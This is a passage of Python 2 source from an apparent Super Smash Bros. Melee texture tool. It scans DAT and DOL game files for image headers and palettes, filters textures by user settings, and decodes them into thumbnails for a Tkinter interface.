		Gui.imageManipTabs.select( Gui.textureTreeImagePane )
	Gui.imageManipTabs.tab( Gui.palettePane, state='disabled' )
	Gui.imageManipTabs.tab( Gui.modelPropertiesPane, state='disabled' )
	Gui.imageManipTabs.tab( Gui.texturePropertiesPane, state='disabled' )
	# Clear the repositories for storing image data (used to prevent garbage collected)
	Gui.datTextureTree.fullTextureRenders = {}
	Gui.datTextureTree.textureThumbnails = {}
def scanDat( priorityTargets=() ):
	""" This function is the main function to handle reading and displaying textures from a DAT file,
		whether from a disc or a standalone file. After identifying texture locations and properties,
		rendering is performed in separate processes. These processes are started and waited for in a
		separate thread, so that this function may return and allow for GUI responsiveness.
			priorityTargets: iterable of image data offsets which bypass the user's texture filters
							 and are decoded/displayed immediately, before the bulk rendering pass. """
	if not globalDatFile: return
	# If this function is called while already processing a file, queue cancellation of the last instance of the function.
	# The last function instance will then re-call this to scan the new file.
	global scanningDat, stopAndScanNewDat
	if scanningDat:
		stopAndScanNewDat = True
		return
	# Check what kind of file this is (this is done a bit more below as well).
	if globalDatFile.fileExt == 'dol':
		scanDol()
		updateProgramStatus( 'File Scan Complete' )
	else: # Anything else is assumed to be a dat/usd/lat/rat, etc.
		hI = globalDatFile.headerInfo
		if hI['rootNodeCount'] > 300 or hI['referenceNodeCount'] > 300 or hI['rtEntryCount'] > 45000: # Values too large will cause the loops in the following section to fully lock up a computer.
			updateProgramStatus( 'wut' )
			msg( 'This file has an unrecognized data structure.'
				'\n\nRoot Node count: ' + str(hI['rootNodeCount']) +
				'\nReference Node count: ' + str(hI['referenceNodeCount']) +
				'\nRT Entry count: ' + str(hI['rtEntryCount']) )
		else:
			updateProgramStatus( 'Scanning File....' )
			Gui.programStatusLabel.update()
			# Prepare to populate the image tree list
			if len( globalDatFile.rtData ) > 200000:
				updateProgramStatus( '¿Qué?' )
				msg('This file has an unrecognized data structure.'
					'\n\nRT Data Byte Length: ' + str( len(globalDatFile.rtData) ) + \
					'\nCalculated Number of RT Entries: ' + str( len(globalDatFile.rtData)/4 ) )
			else: # Seems to be some kind of DAT. Find the textures!
				scanningDat = True
				texturesInfo = identifyTextures( globalDatFile )
				texturesFound = texturesFiltered = totalTextureSpace = 0
				filteredTexturesInfo = []
				if rescanPending(): return
				elif texturesInfo: # i.e. textures were found
					texturesInfo.sort( key=lambda infoTuple: infoTuple[0] ) # Sorts the textures by file offset
					dumpImages = generalBoolSettings['dumpPNGs'].get()
					loadingImage = Gui.imageBank( 'loading' ) # Placeholder thumbnail shown until each texture is actually decoded
					for imageDataOffset, imageHeaderOffset, paletteDataOffset, paletteHeaderOffset, width, height, imageType, mipmapCount in texturesInfo:
						# Ignore textures that don't match the user's filters
						if not passesImageFilters( imageDataOffset, width, height, imageType ):
							if imageDataOffset in priorityTargets: pass # Overrides the filter
							else:
								texturesFiltered += 1
								continue
						# Initialize a structure for the image data
						imageDataLength = hsdStructures.ImageDataBlock.getDataLength( width, height, imageType ) # Returns an int (counts in bytes)
						imageDataStruct = globalDatFile.initDataBlock( hsdStructures.ImageDataBlock, imageDataOffset, imageHeaderOffset, dataLength=imageDataLength )
						imageDataStruct.imageHeaderOffset = imageHeaderOffset
						imageDataStruct.paletteDataOffset = paletteDataOffset # Ad hoc way to locate palettes in files with no palette data headers
						imageDataStruct.paletteHeaderOffset = paletteHeaderOffset
						filteredTexturesInfo.append( (imageDataOffset, width, height, imageType, imageDataLength) )
						totalTextureSpace += imageDataLength
						texturesFound += 1
						# Highlight any textures that need to stand out
						tags = []
						#if width > 1024 or width % 2 != 0 or height > 1024 or height % 2 != 0: tags.append( 'warn' )
						if mipmapCount > 0: tags.append( 'mipmap' )
						# Add this texture to the DAT Texture Tree tab, using the thumbnail generated above
						Gui.datTextureTree.insert( '', 'end', # '' = parent/root, 'end' = insert position
							iid=str( imageDataOffset ),
							image=loadingImage,
							values=(
								uHex(0x20 + imageDataOffset) + '\n('+uHex(imageDataLength)+')', # offset to image data, and data length
								(str(width)+' x '+str(height)), # width and height
								'_'+str(imageType)+' ('+imageFormats[imageType]+')' # the image type and format
							),
							tags=tags
						)
						# Add any associated mipmap images, as treeview children
						if mipmapCount > 0:
							parent = imageDataOffset
							for i in xrange( mipmapCount ):
								# Adjust the parameters for the next mipmap image
								imageDataOffset += imageDataLength # This is of the last image, not the current imageDataLength below
								width = int( math.ceil(width / 2.0) )
								height = int( math.ceil(height / 2.0) )
								imageDataLength = getImageDataLength( width, height, imageType ) # NOTE(review): top level uses ImageDataBlock.getDataLength; presumably equivalent — confirm
								# Add this texture to the DAT Texture Tree tab, using the thumbnail generated above
								Gui.datTextureTree.insert( parent, 'end', # 'end' = insertion position
									iid=str( imageDataOffset ),
									image=loadingImage,
									values=(
										uHex(0x20 + imageDataOffset) + '\n('+uHex(imageDataLength)+')', # offset to image data, and data length
										(str(width)+' x '+str(height)), # width and height
										'_'+str(imageType)+' ('+imageFormats[imageType]+')' # the image type and format
									),
									tags=tags
								)
								filteredTexturesInfo.append( (imageDataOffset, width, height, imageType, imageDataLength) )
					# Immediately decode and display any high-priority targets
					if priorityTargets:
						for textureInfo in texturesInfo:
							if textureInfo[0] not in priorityTargets: continue
							imageDataOffset, _, _, _, width, height, imageType, _ = textureInfo
							dataBlockStruct = globalDatFile.getStruct( imageDataOffset )
							renderTextureData( imageDataOffset, width, height, imageType, dataBlockStruct.length, allowImageDumping=dumpImages )
				# Update the GUI with some of the file's main info regarding textures
				Gui.datFilesizeText.set( "File Size: {:,} bytes".format(hI['filesize']) )
				Gui.totalTextureSpaceText.set( "Total Texture Size: {:,} b".format(totalTextureSpace) )
				Gui.texturesFoundText.set( 'Textures Found: ' + str(texturesFound) )
				Gui.texturesFilteredText.set( 'Filtered Out: ' + str(texturesFiltered) )
				if rescanPending(): return
				if not filteredTexturesInfo: # Done (no textures to display). Nothing else left to do here.
					scanningDat = False # Should be set to False by the GUI thumbnail update loop if the method below is used instead.
				else:
					# tic = time.clock()
					if 0: # Disabled, until this process can be made more efficient
						#print 'using multiprocessing decoding'
						# Start a loop for the GUI to watch for updates (such updates should not be done in a separate thread or process)
						Gui.thumbnailUpdateJob = Gui.root.after( Gui.thumbnailUpdateInterval, Gui.updateTextureThumbnail )
						# Start up a separate thread to handle and wait for the image rendering process
						renderingThread = Thread( target=startMultiprocessDecoding, args=(filteredTexturesInfo, globalDatFile, Gui.textureUpdateQueue, dumpImages) )
						renderingThread.daemon = True # Allows this thread to be killed automatically when the program quits
						renderingThread.start()
					else: # Perform standard single-process, single-threaded decoding
						#print 'using standard, single-process decoding'
						i = 1
						for imageDataOffset, width, height, imageType, imageDataLength in filteredTexturesInfo:
							# Skip items that should have already been processed
							if imageDataOffset in priorityTargets: continue
							# Update this item
							renderTextureData( imageDataOffset, width, height, imageType, imageDataLength, allowImageDumping=dumpImages )
							# Update the GUI to show new renders every n textures
							if i % 10 == 0:
								if rescanPending(): return
								Gui.datTextureTree.update()
							i += 1
						scanningDat = False
				# toc = time.clock()
				# print 'image rendering time:', toc - tic
				updateProgramStatus( 'File Scan Complete' )
				if Gui.datTextureTree.get_children() == (): # Display a message that no textures were found, or they were filtered out.
					Gui.datTextureTreeFiltersMsg.place( relx=0.5, rely=0.5, anchor='center' )
def rescanPending():
	""" Polled during long file scans to determine whether the current scan should bail out.
		Returns True if a rescan of a new file was queued (in which case the scan is restarted
		here) or if the program is shutting down (in which case the GUI is destroyed).
		Returns False when the in-progress scan may safely continue. """
	global scanningDat, stopAndScanNewDat, programClosing
	# A new file was queued while scanning; reset the flags and restart the scan
	if stopAndScanNewDat:
		#cancelCurrentRenders() # Should be enabled if multiprocess texture decoding is enabled
		scanningDat = stopAndScanNewDat = False
		# Restart the DAT/DOL file scan
		clearDatTab()
		scanDat()
		return True
	# Program shutdown was requested mid-scan; tear down the GUI instead of continuing
	if programClosing:
		Gui.root.destroy()
		return True
	return False
def cancelCurrentRenders():
	""" Used for multi-process texture decoding. Stops the GUI thumbnail update loop and shuts down rendering process pool. """
	# Cancel the GUI's thumbnail update loop if it's running
	if Gui.thumbnailUpdateJob:
		Gui.root.after_cancel( Gui.thumbnailUpdateJob )
		Gui.thumbnailUpdateJob = None
	# Stop currently active rendering processes
	if Gui.processRenderingPool:
		Gui.processRenderingPool.close() # No further tasks may be submitted
		Gui.processRenderingPool.terminate() # Force-stops the workers without waiting for outstanding work
		Gui.processRenderingPool = None
	# Empty the thumbnail update queue (this is more efficient than re-creating it)
	try:
		while True:
			Gui.textureUpdateQueue.get_nowait() # Will raise an exception and exit once the loop is empty
	except: pass # Expected: the queue's Empty exception signals draining is done
def startMultiprocessDecoding( filteredTexturesInfo, datFileObj, resultQueue, dumpImages ):
	""" Creates separate processes for decoding texture data for faster performance. This is done in a
		separate thread in order to avoid blocking GUI updates from a function that doesn't immediately return.
			filteredTexturesInfo: 	list of (imageDataOffset, width, height, imageType, imageDataLength) tuples
			datFileObj: 			the file object whose texture data will be decoded
			resultQueue: 			queue the worker processes post finished renders to
			dumpImages: 			passed through to the decoder; whether to also dump PNGs """
	# Create a pool of processors to perform the rendering
	processors = multiprocessing.cpu_count()
	Gui.processRenderingPool = multiprocessing.Pool( processors ) #, maxtasksperchild=1
	for textureProperties in filteredTexturesInfo:
		Gui.processRenderingPool.apply_async( decodeTextureData, args=(textureProperties, datFileObj, resultQueue, dumpImages) )
	# All the jobs have been started. Now wait for them to finish and close the pool.
	Gui.processRenderingPool.close()
	Gui.processRenderingPool.join() # Blocks until all processes are finished
	Gui.processRenderingPool = None
	global stopAndScanNewDat
	if not stopAndScanNewDat:
		# Sentinel value telling the GUI's queue watcher that rendering has finished
		Gui.textureUpdateQueue.put( (None, -1) )
		#Gui.root.event_generate( '<<message>>', when='mark' )
def isEffectsFile( datFileObj ):
	""" Determines whether the given file object is an Effects file, judging by its root and
		reference nodes: exactly one root node, no reference nodes, and the root node must sit
		at data offset 0 with a string table symbol beginning with 'eff'. """
	# Guard clauses: any reference nodes, or anything other than exactly one root node, rules it out
	if datFileObj.referenceNodes: return False
	if len( datFileObj.rootNodes ) != 1: return False
	structOffset, symbol = datFileObj.rootNodes[0]
	return structOffset == 0 and symbol.startswith( 'eff' )
def identifyTextures( datFile ): # todo: this function should be a method on various kinds of distinct dat file objects
	""" Returns a list of tuples containing texture info. Each tuple is of the following form:
			( imageDataOffset, imageHeaderOffset, paletteDataOffset, paletteHeaderOffset, width, height, imageType, mipmapCount )
		Offsets are relative to the file's data section; -1 marks a value that is absent or unknown.
		Special file layouts (menu data, memory card banner/icon files, effects files, stage
		particle tables) are handled by dedicated branches; everything else falls through to a
		generic scan of the data section for standard image data headers. """
	imageDataOffsetsFound = set()
	texturesInfo = []
	# tic = time.clock()
	try:
		# Check if this is a special file with texture data end-to-end
		if (0, 'SIS_MenuData') in datFile.rootNodes: # For alphabet textures such as Kanji; SdMenu.dat/.usd
			if datFile.fileExt not in ( 'frd', 'gmd', 'itd', 'spd', 'ukd' ): # PAL files; no textures in these, just strings
				# There are no headers for these images, but they all have the same properties.
				textureTableStart = toInt( datFile.data[:4] )
				totalTextures = ( datFile.headerInfo['rtStart'] - textureTableStart ) / 0x200 # 0x200 is the image data length
				#scanEndToEndImageData( textureTableStart, width, height, imageType, imageDataLength, totalTextures )
				for i in range( totalTextures ):
					imageDataOffset = textureTableStart + ( i * 0x200 )
					texturesInfo.append( (imageDataOffset, -1, -1, -1, 32, 32, 0, 0) )
		elif (0x1E00, 'MemSnapIconData') in datFile.rootNodes: # The file is LbMcSnap.usd or LbMcSnap.dat (Memory card banner/icon file from SSB Melee)
			# Banner details
			texturesInfo.append( (0, -1, -1, -1, 96, 32, 5, 0) )
			# Icon details
			texturesInfo.append( (0x1800, -1, 0x1C20, -1, 32, 32, 9, 0) )
		elif (0x4E00, 'MemCardIconData') in datFile.rootNodes: # The file is LbMcGame.usd or LbMcGame.dat (Memory card banner/icon file from SSB Melee)
			# Details on three banners
			for offset in ( 0, 0x1800, 0x3000 ):
				texturesInfo.append( (offset, -1, -1, -1, 96, 32, 5, 0) )
			# Icon details
			texturesInfo.append( (0x4800, -1, 0x4C20, -1, 32, 32, 9, 0) )
		else: # Standard DAT processing
			# Check if this is an Effects file. These have standard structuring as well as some unique table structuring
			if isEffectsFile( datFile ):
				# Initialize Struct 0x20 (present in all effects files)
				rootStruct = datFile.getStruct( 0 ) # 0 is the 0x20 offset relative to the data section
				# Check children of Struct 0x20 until a Joint Object is found; structs up until this may be large blocks of image data with rudimentary headers
				imageDataOffset = -1
				imageBlockOffsets = []
				for childStructOffset in rootStruct.getChildren():
					potentialJointObj = datFile.getStruct( childStructOffset )
					if potentialJointObj.validated(): break
					else:
						imageBlockOffsets.append( childStructOffset )
				for mainEffHeaderTableOffset in imageBlockOffsets:
					# Check the first two bytes; values of 0042 indicate that the header actually starts 0x8 bytes in
					if datFile.data[mainEffHeaderTableOffset+1] == 0x42:
						mainHeaderStart = mainEffHeaderTableOffset + 8
						continue # Unsure if these tables even point to textures; if they do, they seem to be in another structure format
					else: mainHeaderStart = mainEffHeaderTableOffset
					# Get the entry count of the table (number of table pointers it contains), and the entries themselves
					mainTableEntryCount = toInt( datFile.data[mainHeaderStart:mainHeaderStart+4] )
					headerTableData = datFile.data[mainHeaderStart+4:mainHeaderStart+4+(mainTableEntryCount*4)]
					headerTablePointers = struct.unpack( '>' + str(mainTableEntryCount) + 'I', headerTableData )
					for pointer in headerTablePointers:
						# Process the E2E header (header for end-to-end image data)
						e2eHeaderOffset = mainEffHeaderTableOffset + pointer
						textureCount, imageType, _, width, height = struct.unpack( '>5I', datFile.data[e2eHeaderOffset:e2eHeaderOffset+0x14] )
						imageDataPointersStart = e2eHeaderOffset + 0x18
						imageDataPointersEnd = imageDataPointersStart + ( 4 * textureCount )
						imageDataPointerValues = struct.unpack( '>' + textureCount * 'I', datFile.data[imageDataPointersStart:imageDataPointersEnd] )
						if imageType == 9:
							paletteDataPointersEnd = imageDataPointersEnd + ( 4 * textureCount )
							paletteDataPointerValues = struct.unpack( '>' + textureCount * 'I', datFile.data[imageDataPointersEnd:paletteDataPointersEnd] )
						for i, offset in enumerate( imageDataPointerValues ):
							imageDataOffset = mainEffHeaderTableOffset + offset
							if imageType == 9:
								# Need to get the palette data's offset too. Its pointer is within a list following the image data pointer list
								paletteDataOffset = mainEffHeaderTableOffset + paletteDataPointerValues[i]
								texturesInfo.append( (imageDataOffset, e2eHeaderOffset, paletteDataOffset, e2eHeaderOffset, width, height, imageType, 0) )
							else:
								texturesInfo.append( (imageDataOffset, e2eHeaderOffset, -1, -1, width, height, imageType, 0) )
				datFile.lastEffTexture = imageDataOffset # Remembers the last effects texture found (or -1 if none)
			# If this a stage file, check for particle effect textures
			if datFile.fileName.startswith( 'Gr' ) and 'map_texg' in datFile.stringDict.values():
				for offset, string in datFile.rootNodes:
					if string == 'map_texg':
						structStart = offset
						break
				# Get the entry count of the table (number of table pointers it contains), and the entries themselves
				mainTableEntryCount = toInt( datFile.data[structStart:structStart+4] )
				headerTableData = datFile.data[structStart+4:structStart+4+(mainTableEntryCount*4)]
				headerTablePointers = struct.unpack( '>' + str(mainTableEntryCount) + 'I', headerTableData )
				for pointer in headerTablePointers: # These are all relative to the start of this structure
					# Process the E2E header
					e2eHeaderOffset = structStart + pointer
					textureCount, imageType, _, width, height = struct.unpack( '>5I', datFile.data[e2eHeaderOffset:e2eHeaderOffset+0x14] )
					imageDataPointersStart = e2eHeaderOffset + 0x18
					imageDataPointersEnd = imageDataPointersStart + ( 4 * textureCount )
					imageDataPointerValues = struct.unpack( '>' + textureCount * 'I', datFile.data[imageDataPointersStart:imageDataPointersEnd] )
					if imageType == 9:
						paletteDataPointersEnd = imageDataPointersEnd + ( 4 * textureCount )
						paletteDataPointerValues = struct.unpack( '>' + textureCount * 'I', datFile.data[imageDataPointersEnd:paletteDataPointersEnd] )
					for i, offset in enumerate( imageDataPointerValues ):
						imageDataOffset = structStart + offset
						if imageType == 9:
							# Need to get the palette data's offset too. Its pointer is within a list following the image data pointer list
							paletteDataOffset = structStart + paletteDataPointerValues[i]
							texturesInfo.append( (imageDataOffset, e2eHeaderOffset, paletteDataOffset, e2eHeaderOffset, width, height, imageType, 0) )
						else:
							texturesInfo.append( (imageDataOffset, e2eHeaderOffset, -1, -1, width, height, imageType, 0) )
			# Get the data section structure offsets, and separate out main structure references
			hI = datFile.headerInfo
			dataSectionStructureOffsets = set( datFile.structureOffsets ).difference( (-0x20, hI['rtStart'], hI['rtEnd'], hI['rootNodesEnd'], hI['stringTableStart']) )
			# Scan the data section by analyzing generic structures and looking for standard image data headers
			for structureOffset in dataSectionStructureOffsets:
				if structureOffset in imageDataOffsetsFound: continue # This is a structure of raw image data, which has already been added
				# Get the image data header struct's data.
				try: # Using a try block because the last structure offsets may raise an error (unable to get 0x18 bytes) which is fine
					structData = datFile.getData( structureOffset, 0x18 )
				except:
					continue
				# Unpack the values for this structure, assuming it's an image data header
				fieldValues = struct.unpack( '>IHHIIff', structData )
				imageDataOffset, width, height, imageType, mipmapFlag, minLOD, maxLOD = fieldValues
				if imageDataOffset in imageDataOffsetsFound: continue # Already added this one
				elif imageDataOffset not in dataSectionStructureOffsets: continue # Not a valid pointer/struct offset!
				# Check specific data values for known restrictions
				if width < 1 or height < 1: continue
				elif width > 1024 or height > 1024: continue
				elif imageType not in ( 0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 14 ): continue
				elif mipmapFlag > 1: continue
				elif minLOD > 10 or maxLOD > 10: continue
				elif minLOD > maxLOD: continue
				# Check for a minimum size on the image data block. Most image types require at least 0x20 bytes for even just a 1x1 pixel image
				childStructLength = datFile.getStructLength( imageDataOffset )
				if childStructLength == -1: pass # Can't trust this; unable to calculate the length (data must be after the string table)
				elif imageType == 6 and childStructLength < 0x40: continue
				elif childStructLength < 0x20: continue
				# Check if the child (image data) has any children (which it shouldn't)
				childFound = False
				for pointerOffset in datFile.pointerOffsets:
					if pointerOffset >= imageDataOffset:
						if pointerOffset < imageDataOffset + childStructLength: # Pointer found in data block
							childFound = True
						break
				if childFound: continue
				# Finally, check that the struct length makes sense (doing this last to avoid the performance hit)
				structLength = datFile.getStructLength( structureOffset ) # This length will include any padding too
				if structLength < 0x18 or structLength > 0x38: continue # 0x18 + 0x20
				texturesInfo.append( (imageDataOffset, structureOffset, -1, -1, width, height, imageType, int(maxLOD)) ) # Palette info will be found later
				imageDataOffsetsFound.add( imageDataOffset )
	except Exception as err:
		print 'Encountered an error during texture identification:'
		print err
	# toc = time.clock()
	# print 'image identification time:', toc - tic
	return texturesInfo
def scanDol():
	""" Scans a DOL (the game's executable) for its built-in textures. Only SSBM DOLs are
		supported; the game version is identified by checking for the "Super Smash Bros. Melee"
		title string at version-specific offsets, which also determines where the texture table
		starts and how many textures it contains. """
	updateProgramStatus( 'Scanning File....' )
	# Update the GUI's basic file attributes.
	if globalDatFile.source == 'disc':
		fileSize = Gui.isoFileTree.item( globalDatFile.path, 'values' )[3]
	else:
		fileSize = os.path.getsize( Gui.datDestination.get().replace('"', '') )
	Gui.datFilesizeText.set( 'File Size: ' + "{:,}".format(int(fileSize)) + ' bytes' )
	# Make sure this is a DOL for SSBM, check the version, and get the starting point for the textures
	# Check the DOL for a string of "Super Smash Bros. Melee" at specific places
	ssbmStringBytes = bytearray()
	ssbmStringBytes.extend( "Super Smash Bros. Melee" )
	if globalDatFile.data[0x3B78FB:0x3B7912] == ssbmStringBytes: # NTSC 1.02
		textureTableStart = 0x409d40
		totalTextures = 287
	elif globalDatFile.data[0x3B6C1B:0x3B6C32] == ssbmStringBytes: # NTSC 1.01
		textureTableStart = 0x409060
		totalTextures = 287
	elif globalDatFile.data[0x3B5A3B:0x3B5A52] == ssbmStringBytes: # NTSC 1.00
		textureTableStart = 0x407D80
		totalTextures = 287
	elif globalDatFile.data[0x3B75E3:0x3B75FA] == ssbmStringBytes: # PAL 1.00
		textureTableStart = 0x040C4E0
		totalTextures = 146
	else: # This DOL doesn't seem to be SSBM
		print 'Non SSBM DOL recieved.'
		return
	# There are no headers for these images, but they all have the same properties.
	width = 32
	height = 32
	imageType = 0
	imageDataLength = 0x200
	scanEndToEndImageData( textureTableStart, width, height, imageType, imageDataLength, totalTextures )
def scanEndToEndImageData( textureTableStart, width, height, imageType, imageDataLength, totalTextures ):
	""" Scans and renders a series of headerless, end-to-end texture images of uniform
		properties (used for the DOL's built-in textures). Each texture is decoded,
		thumbnailed, and added to the DAT Texture Tree, updating the GUI periodically.
		Also polls the rescan/closing flags each iteration so a queued rescan or program
		shutdown can interrupt the loop. """
	# If this function is called while already processing a file, cancel the last instance of the loop. (The last function instance will then re-call this to scan the new file.)
	global scanningDat, stopAndScanNewDat
	texturesFound = 0
	texturesFiltered = 0
	scanningDat = True
	for i in xrange(0, totalTextures):
		imageDataOffset = textureTableStart + (0x200 * i) # NOTE(review): hardcoded 0x200 stride; presumably should match imageDataLength — confirm (all current callers pass 0x200)
		if stopAndScanNewDat:
			scanningDat = False
			stopAndScanNewDat = False
			clearDatTab()
			scanDat()
			return
		elif programClosing:
			Gui.root.destroy()
			return
		elif not passesImageFilters(imageDataOffset, width, height, imageType):
			texturesFiltered += 1
		else:
			try: # To create the full image.
				imageData = globalDatFile.getData( imageDataOffset, imageDataLength )
				newImg = tplDecoder( '', (width, height), imageType, None, imageData )
				newImg.deblockify() # Decodes the image data, to create an rgbaPixelArray.
				currentTex = Image.new( 'RGBA', (width, height) )
				currentTex.putdata( newImg.rgbaPixelArray )
				# Store the full ImageTk image so it's not garbage collected
				Gui.datTextureTree.fullTextureRenders[imageDataOffset] = ImageTk.PhotoImage( currentTex )
				# Create a 64x64 thumbnail/preview image, and store it so it's not garbage collected
				currentTex.thumbnail( (64, 64), Image.ANTIALIAS )
				Gui.datTextureTree.textureThumbnails[imageDataOffset] = ImageTk.PhotoImage( currentTex )
				texturesFound += 1
			except Exception as err:
				# Store the error image so it's not garbage collected
				Gui.datTextureTree.fullTextureRenders[imageDataOffset] = Gui.imageBank( 'noImage' )
				Gui.datTextureTree.textureThumbnails[imageDataOffset] = Gui.imageBank( 'noImage' )
				print 'Failed to decode texture at 0x{:X}; {}'.format( imageDataOffset, err )
			# Add this texture to the DAT Texture Tree tab.
			Gui.datTextureTree.insert( '', 'end', # '' = parent = root, 'end' = insert position
				iid=imageDataOffset, # Becomes a string once it's assigned
				image=Gui.datTextureTree.textureThumbnails[imageDataOffset],
				values=(
					uHex(imageDataOffset) + '\n('+uHex(imageDataLength)+')', # offset to image data, and data length
					(str(width)+' x '+str(height)), # width and height
					'_'+str(imageType)+' ('+imageFormats[imageType]+')' # the image type and format
				),
				tags=()
			)
			# Update the GUI.
			if texturesFound % 5 == 0:
				Gui.texturesFoundText.set( 'Textures Found: ' + str(texturesFound) )
				Gui.texturesFilteredText.set( 'Filtered Out: ' + str(texturesFiltered) )
				Gui.datTextureTree.update()
	scanningDat = False
	# Final tallies, shown once the loop completes
	Gui.texturesFoundText.set( 'Textures Found: ' + str(texturesFound) )
	Gui.texturesFilteredText.set( 'Filtered Out: ' + str(texturesFiltered) )
	Gui.totalTextureSpaceText.set( "Total Texture Size: {:,} b".format(imageDataLength*totalTextures) )
def passesImageFilters( imageDataOffset, width, height, imageType ):
	""" Used to pass or filter out textures displayed in the DAT Texture Tree tab when loading files.
		Accessed and controled by the main menu's "Settings -> Adjust Texture Filters" option.

		Returns True if the texture passes all user-defined filters, False otherwise.

		Fix: the previous implementation called int()/float() on the raw filter strings before any
		validation, so non-numeric filter text raised a ValueError (int() can never return NaN, which
		made the isNaN guards dead code). Conversions are now wrapped so that invalid filter values
		are simply ignored, and a zero height no longer raises ZeroDivisionError. """

	def comparisonPasses( subjectValue, comparator, limitingValue ):
		# Evaluates one comparison; an unrecognized comparator passes by default.
		if comparator == '>' and not (subjectValue > limitingValue): return False
		if comparator == '>=' and not (subjectValue >= limitingValue): return False
		if comparator == '=' and not (subjectValue == limitingValue): return False
		if comparator == '<' and not (subjectValue < limitingValue): return False
		if comparator == '<=' and not (subjectValue <= limitingValue): return False
		return True

	# For each setting, break the value into its respective components (comparator & filter value),
	# and then run the appropriate comparison. Invalid (non-numeric) filter values are ignored.
	widthComparator, widthValue = imageFilters['widthFilter']
	if widthValue != '':
		try:
			if not comparisonPasses( width, widthComparator, int(widthValue) ): return False
		except ValueError: pass

	heightComparator, heightValue = imageFilters['heightFilter']
	if heightValue != '':
		try:
			if not comparisonPasses( height, heightComparator, int(heightValue) ): return False
		except ValueError: pass

	aspectRatioComparator, aspectRatioValue = imageFilters['aspectRatioFilter']
	if aspectRatioValue != '' and height != 0: # Guard against ZeroDivisionError on malformed textures
		aspectRatio = float( width ) / height
		try:
			# The filter may be given as a ratio ("4:3" or "4/3") or as a plain decimal value
			if ':' in aspectRatioValue:
				numerator, denomenator = aspectRatioValue.split(':')
				aspectRatioLimit = float( numerator ) / float( denomenator )
			elif '/' in aspectRatioValue:
				numerator, denomenator = aspectRatioValue.split('/')
				aspectRatioLimit = float( numerator ) / float( denomenator )
			else:
				aspectRatioLimit = float( aspectRatioValue )

			if not isNaN( aspectRatioLimit ) and not comparisonPasses( aspectRatio, aspectRatioComparator, aspectRatioLimit ): return False
		except ( ValueError, ZeroDivisionError ): pass

	imageTypeComparator, imageTypeValue = imageFilters['imageTypeFilter']
	if imageTypeValue != '':
		try:
			if not comparisonPasses( imageType, imageTypeComparator, int(imageTypeValue) ): return False
		except ValueError: pass

	offsetComparator, offsetValue = imageFilters['offsetFilter']
	if offsetValue != '':
		try:
			# Accept both hex (0x-prefixed) and decimal offset filters. +0x20 converts the
			# data-section-relative offset to an absolute file offset for the comparison.
			if offsetValue.startswith( '0x' ):
				offsetLimit = int( offsetValue, 16 )
			else:
				offsetLimit = int( offsetValue )
			if not comparisonPasses( imageDataOffset + 0x20, offsetComparator, offsetLimit ): return False
		except ValueError: pass

	return True
def parseTextureDetails( iid ):
	""" Reads a texture's properties back out of its DAT Texture Tree treeview row. The iid is the
		texture's image data offset (as a string); the row's 'values' column strings are parsed to
		recover the data length, dimensions, and image type.
		Returns ( imageDataOffset, imageDataLength, width, height, imageType ), all ints. """
	offsetAndLength, dimensions, typeString = Gui.datTextureTree.item( iid, 'values' )

	# The first column contains the offset and, in parentheses, the hex data length
	lengthString = offsetAndLength.split( '(' )[1].replace( ')', '' )

	# The dimensions column is of the form "width x height"
	widthString, heightString = dimensions.split( 'x' )

	# The type column starts with "_<number>"; the number is the image type
	typeNumber = typeString.split()[0].replace( '_', '' )

	return int( iid ), int( lengthString, 16 ), int( widthString.strip() ), int( heightString.strip() ), int( typeNumber )
def getMipmapLevel( iid ):
	""" Determines a texture's position within a mipmap group in the DAT Texture Tree tab.
		Returns -1 if the treeview item doesn't exist or isn't tagged as a mipmap texture,
		0 for a top-level mipmap texture, and 1+ for successively nested child textures. """
	if not Gui.datTextureTree.exists( iid ) or 'mipmap' not in Gui.datTextureTree.item( iid, 'tags' ):
		return -1

	level = 0
	parentIid = Gui.datTextureTree.parent( iid )

	if parentIid: # This item is a child of a parent mipmap texture; count siblings up to it
		for childIid in Gui.datTextureTree.get_children( parentIid ):
			level += 1
			if childIid == iid: break

	return level
def getImageDataLength( width, height, imageType ): # Arguments should each be ints.
	""" Calculates the byte length of a texture's encoded image data, from its dimensions and
		image type. Textures are encoded in fixed-size blocks, so each dimension is first rounded
		up to a whole number of blocks; all encoded pixels count toward the length (including
		those in unused block areas), not just the visible ones of the given dimensions.
		Returns the length in bytes, as an int. """

	# ( blockWidth, blockHeight, bytesPerPixel ) for each image type
	encodingProperties = {
		0: ( 8, 8, .5 ),	# i4
		1: ( 8, 4, 1 ),		# i8
		2: ( 8, 4, 1 ),		# ia4
		3: ( 4, 4, 2 ),		# ia8
		4: ( 4, 4, 2 ),		# rgb565
		5: ( 4, 4, 2 ),		# rgb5a3
		6: ( 4, 4, 4 ),		# rgba32
		8: ( 8, 8, .5 ),	# c4
		9: ( 8, 4, 1 ),		# c8
		10: ( 4, 4, 2 ),	# c14x2
		14: ( 8, 8, .5 )	# cmpr
	}
	blockWidth, blockHeight, bytesPerPixel = encodingProperties[imageType]

	# Round each dimension up to the nearest whole block
	paddedWidth = math.ceil( float(width) / blockWidth ) * blockWidth
	paddedHeight = math.ceil( float(height) / blockHeight ) * blockHeight

	return int( paddedWidth * paddedHeight * bytesPerPixel ) # Result is in bytes.
def getPaletteInfo( datFile, imageDataOffset ):
	""" Doesn't get the palette data itself, but attempts to find/return information on it. There is hardcoded information for certain files,
		which are checked first, followed by checks for effects files. Standard DAT/USD files are then checked using two different methods,
		by looking through the structure hierarchy from the bottom upwards. The first method looks for a path from Image Headers to Texture
		structures, in order to get the palette header's offset and other info. The second method (if the first fails), checks for a Image
		Data Array structure, and then the parent Texture Animation Struct. From there, the palette header array structure and respective
		palette header for the target image can be found.
		This returns a tuple of info in the form ( paletteDataOffset, paletteHeaderOffset, paletteLength, paletteType, paletteColorCount ) """

	# Handle special cases for certain files
	if (0x1E00, 'MemSnapIconData') in datFile.rootNodes: # The file is LbMcSnap.usd or LbMcSnap.dat (Memory card banner/icon file from SSB Melee)
		# There's only one palette that might be desired in here (no headers available).
		return 0x1C00, -1, 0x200, 2, 256
	elif (0x4E00, 'MemCardIconData') in datFile.rootNodes: # The file is LbMcGame.usd or LbMcGame.dat (Memory card banner/icon file from SSB Melee)
		return 0x4C00, -1, 0x200, 2, 256
	elif isEffectsFile( datFile ): # These have normal structuring as well as some unique table structuring
		imageDataStruct = datFile.getStruct( imageDataOffset )
		# The unique structuring should have already saved the palette info
		if imageDataStruct and imageDataStruct.paletteDataOffset != -1 and imageDataStruct.paletteHeaderOffset != -1:
